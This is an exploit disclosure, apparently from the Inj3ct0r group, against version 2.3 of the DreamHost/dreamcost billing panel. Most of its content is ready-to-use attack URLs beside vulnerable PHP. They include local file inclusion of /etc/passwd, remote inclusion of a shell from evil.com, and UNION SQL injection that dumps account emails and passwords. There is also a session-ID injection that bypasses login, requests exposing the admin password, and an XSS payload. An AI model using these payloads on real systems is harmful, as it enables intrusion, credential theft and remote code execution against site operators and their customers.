DreamHost versions 2.3 and below suffer from remote SQL injection, remote file inclusion, local file inclusion, and cross site scripting vulnerabilities.
63b5564c74ab83334a7ccb85839493eb9482fe5028407714c3457fd47b5cc7de
=================================================
DreamHost <= && > 2.3 global inj3ct0r.com Exploit
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net
Decided to make a review to DreamHost - Billing Panel
Site product: dreamcost.com
Version: <= && > 2.3
----------------------------------------------------------------
Local Include Exploit:
/members.php?page=/../../../../../../../../../../etc/passwd%00
Vulnerable code:
// member_template.html
<?
include("member_$page.html");
?>
-----------------------------------------------------------------
Remote Include Exploit:
/admin/?page=http://evil.com/shell.php?
Vulnerable code:
// /admin/template.html
include("$page$page_ext");
------------------------------------------------------------------
Sql Inj3ct0r Exploit:
members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=you session_id
and
members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=-1'+OR+login_logged=0x59%20--%20
Vulnerable code:
// member_orders_view.html
$db = new ps_DB;
$q = "SELECT * FROM orders WHERE order_id='$order_id' AND order_account_id='$account_id' ORDER BY order_id";
-------------------------------------------------------------
Admin Login: members.php?Page=static&content=login
Admin Password: members.php?Page=static&content=password
Path: members.php?Page=static&content=path
Vulnerable code:
// member_static.thml
<? echo setup($content);?>
// functions.php
function setup($field) {
$db = new ps_DB;
$q = "SELECT setup_$field FROM setup WHERE setup_id='1'";
$db->query($q);
$db->next_record();
$ret = $db->f("setup_$field");
return $ret;
}
$db->query($q);
-------------------------------------------------------------
SQL-Inj3ct0r entry under randomly Account
members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20
Vulnerable code:
// member_account.html
$pass = is_logged($session_id);
// functions.php
function is_logged($session_id) {
$db = new ps_DB;
$q = "SELECT * FROM login WHERE login_id = '$session_id'";
$db->query($q);
$db->next_record();
$ret = $db->f("login_logged");
return $ret;
}
--------------------------------------------------------------
Xss Exploit:
/members.php?page=static&content=<script>alert('inj3ct0r.com')</script>
---------------------------------
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]